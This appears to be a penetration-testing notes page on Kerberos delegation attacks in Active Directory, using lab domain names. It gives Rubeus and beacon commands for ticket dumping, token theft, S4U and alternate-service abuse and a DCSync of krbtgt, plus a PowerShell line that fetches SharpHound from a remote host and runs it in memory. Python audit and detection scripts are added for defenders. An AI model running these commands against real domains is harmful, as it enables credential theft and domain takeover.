Tips & Tricks

PowerShell

Running a command in the background (the equivalent of appending & to a command on Linux):

Start-Job {<COMMAND TO RUN>}

Killing the initial shell WILL kill the subprocess. Only use this command if you know that the initial shell will remain active.

Command Prompt

Running a command in the background (the equivalent of appending & to a command on Linux):

START /B <COMMAND>

Killing the initial shell WILL kill the subprocess. Only use this command if you know that the initial shell will remain active.

Downloading and Running an EXE in Memory

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())

Get a list of tickets:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

Extract:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap

Use the extracted ticket:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=

Steal the token of that process:

beacon> steal_token 1540

You can also force computer accounts to authenticate to the service and capture their tickets. Monitor for new tickets with Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

Run SharpSpoolTrigger to force authentication:

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io

DC-2 is the target (the host coerced into authenticating) and WEB is the listener.

Machine tickets can be used with the S4U2Self Abuse method below.

Constrained Delegation

Constrained delegation restricts the services on whose behalf the server can act for a user. With these constraints the server no longer caches other users' TGTs (as it does with unconstrained delegation); it can only use its own TGT to request a TGS for another user, and only to the listed services.

Finding computers with constrained delegation:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Finding users with constrained delegation:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Constrained delegation can be configured on computer accounts as well as user accounts.

First, we need the TGT of the account (user or computer) that is trusted for delegation. You can get this with the dump command of Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

If you have the NTLM or AES hash of the account, you can request the TGT with the asktgt command in Rubeus instead.

Next, perform an S4U request to obtain a usable TGS for the allowed service:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap

  • /impersonateuser is the user we want to impersonate; they should have local admin access on the target machine. nlamb is a domain admin, which is required for accessing the domain controller.

  • /msdsspn is the service principal name that SQL-2 is allowed to delegate to.

  • /user is the principal allowed to perform the delegation.

  • /ticket is the TGT for /user.

The above performs an S4U2Self followed by an S4U2Proxy request to obtain the service ticket needed.

Create a process whose token we can steal:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

Steal its token:

beacon> steal_token 5540

Alternate Service Name

Reference: https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/

When configuring Kerberos Constrained Delegation, keep in mind that you are delegating credentials not only to the service type you specified but also to all other service types running under the same account. Also, the SPN specified in the sname field does not seem to be used as part of the authentication mechanism.

However, the sname field of the ticket is not signed and can be tampered with. So you can change the sname of the ticket to another SPN that is being run by the same account as the original one and get access to that service instead.
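Both the constrained delegation searches above and the alternate service name behaviour come down to two directory facts: which accounts carry msDS-AllowedToDelegateTo (and whether protocol transition is also enabled on them), and which other SPNs live on the account that owns the target SPN, since every ticket for that account is protected by the same key. The Python below is an added audit example, not code from these notes, Rubeus or ADSearch; it runs those checks over a constructed snapshot of the relevant attributes (host and account names reuse the lab names above, every attribute value is invented) so that it works offline. Against a real domain the same logic would be fed from an LDAP query returning userAccountControl, servicePrincipalName and msDS-AllowedToDelegateTo.

```python
from dataclasses import dataclass, field

# userAccountControl bits (documented ADS_USER_FLAG values).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (use any authentication protocol)


@dataclass
class Account:
    sam: str                                            # sAMAccountName
    uac: int                                            # userAccountControl
    spns: list = field(default_factory=list)            # servicePrincipalName
    delegate_to: list = field(default_factory=list)     # msDS-AllowedToDelegateTo


# Constructed snapshot of the attributes an LDAP search would return.
# Names reuse the lab names from the notes; every attribute value is invented.
SNAPSHOT = [
    Account("DC-2$", 0x82000, ["cifs/dc-2.dev.cyberbotic.io",
                               "ldap/dc-2.dev.cyberbotic.io",
                               "HOST/dc-2.dev.cyberbotic.io"]),
    Account("SQL-2$", 0x1001000, ["MSSQLSvc/sql-2.dev.cyberbotic.io:1433"],
            ["cifs/dc-2.dev.cyberbotic.io"]),
    Account("WEB$", 0x1000, ["HTTP/web.dev.cyberbotic.io"],
            ["cifs/dc-2.dev.cyberbotic.io"]),
    Account("svc_report", 0x10200, ["HTTP/report.dev.cyberbotic.io"],
            ["MSSQLSvc/sql-2.dev.cyberbotic.io:1433"]),
    Account("nlamb", 0x10200),
    Account("jking", 0x110200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | NOT_DELEGATED
]


def split_spn(spn):
    """'cifs/dc-2.dev.cyberbotic.io:445' -> ('cifs', 'dc-2.dev.cyberbotic.io'), lower-cased."""
    service, _, rest = spn.partition("/")
    host = rest.split(":", 1)[0]
    return service.lower(), host.lower()


def index_spns(snapshot):
    """Map host -> (account owning SPNs on that host, set of its service classes).

    Tickets for every SPN on an account are encrypted with that account's single
    long-term key, which is why a ticket for cifs/ on DC-2 is just as usable for
    ldap/ on DC-2 once the sname is swapped.
    """
    by_host = {}
    for acct in snapshot:
        classes = {split_spn(s)[0] for s in acct.spns}
        for s in acct.spns:
            by_host[split_spn(s)[1]] = (acct.sam, classes)
    return by_host


def audit_constrained_delegation(snapshot):
    """One finding per (delegating account, allowed target SPN)."""
    by_host = index_spns(snapshot)
    findings = []
    for acct in snapshot:
        for target in acct.delegate_to:
            service, host = split_spn(target)
            owner, classes = by_host.get(host, (None, {service}))
            findings.append({
                "account": acct.sam,
                "allowed_spn": target,
                "target_account": owner,
                "effective_services": sorted(classes),
                # Without protocol transition the S4U2Self ticket is not forwardable, so
                # classic constrained delegation needs a user who authenticated with Kerberos.
                "protocol_transition": bool(acct.uac & TRUSTED_TO_AUTH_FOR_DELEGATION),
            })
    return findings


def unconstrained_accounts(snapshot):
    """Accounts with unconstrained delegation (they cache TGTs of anyone who authenticates)."""
    return [a.sam for a in snapshot if a.uac & TRUSTED_FOR_DELEGATION]


def impersonation_blocked(snapshot, sam):
    """True when the user is marked sensitive: the KDC refuses S4U2Proxy tickets for them.

    Membership of the Protected Users group has the same effect but is not modelled here.
    """
    acct = next(a for a in snapshot if a.sam.lower() == sam.lower())
    return bool(acct.uac & NOT_DELEGATED)


if __name__ == "__main__":
    for f in audit_constrained_delegation(SNAPSHOT):
        mode = "protocol transition" if f["protocol_transition"] else "Kerberos only"
        print(f"{f['account']:11} -> {f['allowed_spn']:40} owner={f['target_account']} "
              f"also reaches={','.join(f['effective_services'])} ({mode})")
    print("unconstrained:", unconstrained_accounts(SNAPSHOT))
    for user in ("nlamb", "jking"):
        print(f"{user}: S4U2Proxy impersonation blocked = {impersonation_blocked(SNAPSHOT, user)}")
```

The report is meant to be read as exposure: the "also reaches" column is what a single delegation entry actually grants, and the NOT_DELEGATED check is the cheapest fix for the accounts that matter most, since marking admin accounts as sensitive (or putting them in Protected Users) makes the /impersonateuser step fail for them regardless of how the delegation is configured.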

You can abuse this with Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

beacon> steal_token 2580

If you obtain an LDAP ticket for the DC, you can perform a DCSync attack:

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

S4U2Self Abuse

S4U2Self allows a service to obtain a TGS to itself on behalf of another user. S4U2Proxy allows a service to obtain a TGS on behalf of a user to another service.

If we have the TGT of a computer account that can perform S4U2Self, we can request a ticket impersonating any user to the services provided by that account.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

The /self flag requests a TGS on behalf of another user to the account's own service.

You can then use that ticket to create a process as that user and use it to authenticate to other systems.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

beacon> steal_token 2664
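On the defensive side, the S4U2Proxy step used in the constrained delegation and alternate service name variants above leaves a trace on the domain controller: the Kerberos service ticket event 4769 carries a TransitedServices field that the KDC fills in when a ticket was issued through delegation. The Python below is an added detection example, not part of these notes; it parses constructed 4769 records (the field names follow the documented event schema, the values are invented lab data) and flags delegated tickets that impersonate privileged users or target domain controller accounts. An S4U2Self-only ticket (the /self case) does not populate this field, so it needs separate correlation, for example 4769 events for a user requested from the address of the service host itself.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Watch-lists a defender would maintain; the names reuse the lab names from the notes.
PRIVILEGED_USERS = {"nlamb", "administrator", "krbtgt"}
DC_ACCOUNTS = {"dc-2$"}

# Constructed sample: three 4769 records in the exported event XML layout.
# Field names follow the documented schema; every value is invented lab data.
SAMPLE_EVENTS = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4769</EventID></System>
 <EventData>
  <Data Name="TargetUserName">jking@DEV.CYBERBOTIC.IO</Data>
  <Data Name="ServiceName">SQL-2$</Data>
  <Data Name="IpAddress">::ffff:10.10.17.100</Data>
  <Data Name="Status">0x0</Data>
  <Data Name="TransitedServices">-</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4769</EventID></System>
 <EventData>
  <Data Name="TargetUserName">nlamb@DEV.CYBERBOTIC.IO</Data>
  <Data Name="ServiceName">DC-2$</Data>
  <Data Name="IpAddress">::ffff:10.10.17.25</Data>
  <Data Name="Status">0x0</Data>
  <Data Name="TransitedServices">MSSQLSvc/sql-2.dev.cyberbotic.io:1433@DEV.CYBERBOTIC.IO</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4769</EventID></System>
 <EventData>
  <Data Name="TargetUserName">jking@DEV.CYBERBOTIC.IO</Data>
  <Data Name="ServiceName">SQL-2$</Data>
  <Data Name="IpAddress">::ffff:10.10.17.40</Data>
  <Data Name="Status">0x0</Data>
  <Data Name="TransitedServices">HTTP/report.dev.cyberbotic.io@DEV.CYBERBOTIC.IO</Data>
 </EventData>
</Event>
</Events>"""


def parse_4769(xml_text):
    """Return the EventData fields of every 4769 event as a dict keyed by Data Name."""
    root = ET.fromstring(xml_text)
    records = []
    for ev in root.iter(NS + "Event"):
        if ev.findtext(NS + "System/" + NS + "EventID") != "4769":
            continue
        records.append({d.get("Name"): (d.text or "") for d in ev.iter(NS + "Data")})
    return records


def used_delegation(rec):
    """The KDC writes '-' unless the ticket was obtained through S4U2Proxy."""
    return rec.get("TransitedServices", "-").strip() not in ("", "-")


def flag_delegation(records):
    """Alert on successful delegated tickets for privileged users or DC service accounts."""
    alerts = []
    for rec in records:
        if not used_delegation(rec) or rec.get("Status") != "0x0":
            continue
        user = rec["TargetUserName"].split("@")[0].lower()
        service = rec["ServiceName"].lower()
        reasons = []
        if user in PRIVILEGED_USERS:
            reasons.append(f"privileged user {user} impersonated via {rec['TransitedServices']}")
        if service in DC_ACCOUNTS:
            reasons.append(f"delegated ticket issued for domain controller account {rec['ServiceName']}")
        if reasons:
            alerts.append({"user": user, "service": rec["ServiceName"],
                           "via": rec["TransitedServices"], "source": rec.get("IpAddress"),
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in flag_delegation(parse_4769(SAMPLE_EVENTS)):
        print(alert["user"], "->", alert["service"], "from", alert["source"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

With real data the same functions run over the output of wevtutil or Get-WinEvent exported as XML from the domain controllers; the middle record is the one the constrained delegation walkthrough above would produce (a ticket for nlamb to DC-2 transited through the SQL-2 service), and it is the only one that fires.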

Last updated 2 years ago


This can be mitigated by enabling the policy "Microsoft network server: Server SPN target name validation level: Required from client".